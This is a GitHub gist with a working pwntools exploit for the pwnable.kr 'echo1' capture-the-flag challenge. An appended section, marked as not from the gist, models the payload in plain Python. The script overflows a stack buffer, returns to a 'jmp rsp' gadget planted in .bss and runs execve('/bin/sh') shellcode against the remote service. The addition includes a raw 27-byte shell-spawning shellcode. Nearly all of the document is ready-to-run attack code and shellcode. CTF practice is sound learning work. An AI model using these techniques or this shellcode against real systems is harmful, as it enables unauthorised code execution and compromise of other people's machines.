Gist Pascal-0x90/1724c77a7598a93a848b12f59bfbc393
Created March 9, 2021 23:56
Pwnable.kr Solves: echo1
#!/usr/bin/env python3
###################################
# Std imports
import sys
# Third party imports
from pwn import *
# Binary
BINARY = sys.argv[1]
# Pwntools binary info
context(os='linux', arch='amd64')
r = ROP(BINARY)
e = ELF(BINARY)
l = e.libc
# Connections and interactions
#p = process(BINARY)
p = remote("pwnable.kr", 9010)
# GDB anyone?
#gdb.attach(p)
#input("Ready to roll?")
###################################
# Junk to reach the saved return address (40 bytes covers the stack buffer and the saved rbp)
JUNK = b"i"*40
'''
Main idea:
- NX is off, so we want to execute shellcode rather than build a ROP chain
- The binary has no usable jmp gadget of its own
- Furthermore, I don't want to do complex ROPping
- We can write to:
  - id (in .bss)
  - s (on the stack)
  - o (maybe; it lives on the heap though)
- So we can place either an address or raw assembly at a location whose address we know
- The only question is whether that location is executable; with NX off, .bss is
'''
# Address of id, in .bss
ID = 0x6020A0
# What do we want to put there? #OverwriteTheBSS
jrsp = "jmp rsp"
jmp_rsp = asm(jrsp)
# What shellcode do we want to execute
sc = shellcraft.sh() # Yeah we are kinda basic here
'''
Flow:
1. Overwrite the saved return address with the address of the jmp rsp planted in id
2. ret lands on jmp rsp; rsp now points just past the return address, i.e. at the shellcode
3. Interact with the new shell
Layout: buffer + address + shellcode
'''
# Create our payload
pay = JUNK
pay += p64(ID) # p64 since this is a 64 bit binary
pay += asm(sc) # Our shellcode to execute once jumping back to the stack
# Check the length of our payload
log.info(f"Payload Length: {len(pay)}")
'''
To set id to the contents of our assembly, we send it as the
first thing the program asks for during its execution.
'''
# Recv till ready to read
p.clean()
'''
Important thing to remember here: sometimes which function we
use to send input (sendline vs send) matters, since the extra
newline counts as part of our input. In this case we are telling
the program to jump to this location, and even if some arbitrary
byte (the newline) follows the assembly, the jmp is taken first,
so it is negligible in this instance.
'''
# Send in our asm, NUL-padded (pwntools on Python 3 wants bytes)
p.sendline(jmp_rsp.ljust(6, b"\0"))
# Now send our option of "echo" type
p.sendline(b"1")
# Send in our actual payload
p.sendline(pay)
# Should have a shell now, go interactive to check
p.interactive()
p.clean()
'''
p.sendline(b"cat echo1")
data = p.recvall(timeout=2)
print(data)
'''
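The following is an added example, not part of the gist, that models the technique the script above relies on in pure Python (no pwntools needed): the payload layout, the control-flow chain ret -> planted `jmp rsp` in .bss -> shellcode on the stack, and the two pre-flight checks worth running before sending anything. It takes the 40-byte offset, the `id` address 0x6020A0 and the 6-byte NUL-padded gadget slot from the script; the stack base address is an arbitrary placeholder, and the shellcode is a constructed sample (the classic 27-byte x86-64 execve("/bin/sh") stub) standing in for shellcraft.sh(). The newline check matters because the script uses sendline: a 0x0a byte anywhere in the shellcode would end the line-oriented read early, and the trailing newline sendline appends must be the only one.

```python
# Added example (not from the gist): pure-Python model of the jmp-rsp payload and its checks.
# Assumed from the script: 40 bytes to the saved return address, `id` at 0x6020A0 in .bss,
# a 6-byte slot for the gadget (the script's ljust(6)). Stack base below is a placeholder.
import struct

JMP_RSP = b"\xff\xe4"      # x86-64 encoding of `jmp rsp`, the bytes asm("jmp rsp") produces
ID_ADDR = 0x6020A0         # address of `id` (.bss) used as the return target
RET_OFFSET = 40            # bytes of junk before the saved return address

# Constructed sample shellcode: classic 27-byte execve("/bin/sh", ["/bin/sh"], NULL) stub.
# It stands in for shellcraft.sh() so this file runs without pwntools. It is never executed here.
EXECVE_SH = bytes.fromhex("31c048bbd19d9691d08c97ff48f7db53545f995257545eb03b0f05")


def plant_gadget(gadget: bytes, slot: int) -> bytes:
    """Bytes sent for the `id` prompt: the gadget NUL-padded to the slot, like the script's ljust(6)."""
    if len(gadget) > slot:
        raise ValueError("gadget (%d bytes) does not fit the %d-byte slot" % (len(gadget), slot))
    return gadget.ljust(slot, b"\0")


def build_payload(ret_addr: int, shellcode: bytes, offset: int = RET_OFFSET) -> bytes:
    """Junk up to the saved return address, then the planted gadget's address, then the shellcode."""
    return b"i" * offset + struct.pack("<Q", ret_addr) + shellcode


def bad_byte_offsets(data: bytes, bad: bytes = b"\n") -> list:
    """Offsets of bytes a line-oriented read would stop at; must be empty for a sendline payload."""
    return [i for i, b in enumerate(data) if b in bad]


def trace_control_flow(bss: dict, stack_base: int, payload: bytes, offset: int = RET_OFFSET):
    """Follow the chain after the overflowed function returns.

    `ret` pops the 8 bytes at `offset` into rip and leaves rsp just past them.
    If the popped address holds `jmp rsp` (writable and, with NX off, executable .bss),
    the next rip is rsp itself, i.e. the stack bytes right after the return address.
    `bss` maps a start address to the bytes planted there (exact-start lookup is enough here).
    Returns the list of (instruction, rip) hops and the bytes execution lands on.
    """
    rip = struct.unpack_from("<Q", payload, offset)[0]
    rsp = stack_base + offset + 8
    hops = [("ret", rip)]
    if bss.get(rip, b"")[:len(JMP_RSP)] != JMP_RSP:
        raise ValueError("no jmp rsp planted at 0x%x; ret would not reach the stack" % rip)
    rip = rsp
    hops.append(("jmp rsp", rip))
    return hops, payload[rsp - stack_base:]


def plan(shellcode: bytes = EXECVE_SH, stack_base: int = 0x7FFFFFFFE000):
    """Build both inputs, run the pre-flight checks, and show where execution ends up."""
    gadget_input = plant_gadget(JMP_RSP, 6)
    payload = build_payload(ID_ADDR, shellcode)
    # Neither input may contain a newline: the one sendline appends is the line terminator.
    if bad_byte_offsets(gadget_input) or bad_byte_offsets(payload):
        raise ValueError("input contains a newline and would be truncated by a line read")
    bss = {ID_ADDR: gadget_input}
    hops, landing = trace_control_flow(bss, stack_base, payload)
    return payload, hops, landing


if __name__ == "__main__":
    payload, hops, landing = plan()
    print("payload length:", len(payload))
    for insn, rip in hops:
        print("%-8s -> rip = 0x%x" % (insn, rip))
    print("bytes at rip == shellcode:", landing == EXECVE_SH)
```

Run it directly to print the hop chain; with pwntools installed, `asm(shellcraft.sh())` can be passed to `plan()` in place of the constructed stub to confirm it also contains no newline before it is sent with `sendline`.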